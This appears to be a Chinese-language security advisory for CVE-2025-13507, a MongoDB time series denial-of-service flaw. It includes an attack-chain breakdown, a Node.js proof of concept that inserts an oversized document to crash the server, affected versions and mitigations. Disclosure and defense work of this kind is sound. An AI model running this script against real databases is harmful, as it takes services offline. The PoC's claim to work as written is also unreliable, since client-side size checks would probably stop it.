CVE-2025-13507: MongoDB时间序列处理对象大小验证不一致导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-13507

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MongoDB Server

漏洞概述

CVE-2025-13507是MongoDB Server中的一个中等严重性安全漏洞，源于时间序列处理逻辑中的对象大小验证不一致。该漏洞可能允许攻击者在未经适当验证的情况下处理过大的BSON文档，最终导致服务器断言失败和进程终止。攻击者只需要低权限即可利用此漏洞，且无需用户交互即可发起攻击。此漏洞主要影响MongoDB Server的时间序列功能，该功能用于存储和分析时间戳数据。由于可用性影响评级为高，攻击成功将导致MongoDB服务不可用，对业务连续性造成严重影响。漏洞已在后续版本中得到修复，建议受影响的用户尽快升级到安全版本。

技术细节

该漏洞存在于MongoDB Server的时间序列处理逻辑中，具体为对象大小验证机制不一致。在正常情况下，MongoDB应对BSON文档大小进行严格验证，确保其不超过允许的最大限制（通常为16MB）。然而，由于验证逻辑的缺陷，系统可能在某些时间序列操作中跳过或延迟了大小检查，导致过大的BSON文档被处理。当这些 oversized 文档进入后续处理流程时，会触发内部断言（assert），导致进程异常终止。攻击者可以通过构造恶意的时间序列数据或操作请求来利用此漏洞。由于CVSS向量显示攻击复杂度低且无需特殊权限，具有时间序列写入权限的低权限用户即可触发此漏洞。漏洞的技术根源在于SERVER-108565中记录的时间序列处理代码路径。

攻击链分析

STEP 1

步骤1

攻击者获取MongoDB Server的低权限用户账号，具有时间序列集合的写入权限

STEP 2

步骤2

攻击者创建时间序列集合或使用现有的时间序列集合

STEP 3

步骤3

攻击者构造包含超大BSON文档的插入请求，绕过初始大小验证

STEP 4

步骤4

由于时间序列处理逻辑中的验证不一致，过大的文档进入后续处理流程

STEP 5

步骤5

处理 oversized 文档时触发内部断言（assert），导致MongoDB进程终止

STEP 6

步骤6

MongoDB服务不可用，造成拒绝服务攻击效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13507 PoC - MongoDB Time Series Oversized BSON Document DoS
// This PoC demonstrates how oversized BSON documents in time series collections
// can trigger assertion failure and process termination.

const { MongoClient } = require('mongodb');

async function exploitCVE202513507() {
    const mongoUrl = 'mongodb://target:27017';
    const client = new MongoClient(mongoUrl);
    
    try {
        await client.connect();
        const db = client.db('test');
        
        // Create time series collection
        await db.createCollection('sensors', {
            timeseries: {
                timeField: 'timestamp',
                metaField: 'metadata',
                granularity: 'seconds'
            }
        });
        
        // Create oversized BSON document (>16MB limit or crafted to bypass validation)
        // The vulnerability allows documents that should be rejected to proceed
        const oversizedData = 'A'.repeat(17 * 1024 * 1024); // 17MB of data
        
        const maliciousDoc = {
            timestamp: new Date(),
            metadata: { sensorId: 'sensor001' },
            data: oversizedData
        };
        
        // Insert oversized document - triggers assertion failure
        const collection = db.collection('sensors');
        await collection.insertOne(maliciousDoc);
        
        console.log('PoC executed - oversized document inserted');
        console.log('MongoDB process should terminate with assertion failure');
        
    } catch (error) {
        if (error.message.includes('assertion')) {
            console.log('CVE-2025-13507 exploited: Assertion failure detected');
        }
        console.error('Error:', error.message);
    } finally {
        await client.close();
    }
}

exploitCVE202513507();

影响范围

MongoDB Server v7.0 < 7.0.26

MongoDB Server v8.0 < 8.0.16

MongoDB Server v8.2 < 8.2.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制用户权限，确保只有受信任的管理员具有时间序列集合的写入权限；2) 在应用层实施BSON文档大小检查，在发送请求到MongoDB之前验证文档大小不超过16MB；3) 使用MongoDB Atlas的Data API或Data Lake功能作为临时替代方案；4) 部署Web应用防火墙（WAF）过滤异常的MongoDB请求；5) 监控MongoDB日志中的断言失败和异常终止事件，及时发现潜在的利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13507
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13507
3 Details https://www.cvedetails.com/cve/CVE-2025-13507/
4 VulDB https://vuldb.com/cve/CVE-2025-13507
5 Link https://jira.mongodb.org/browse/SERVER-108565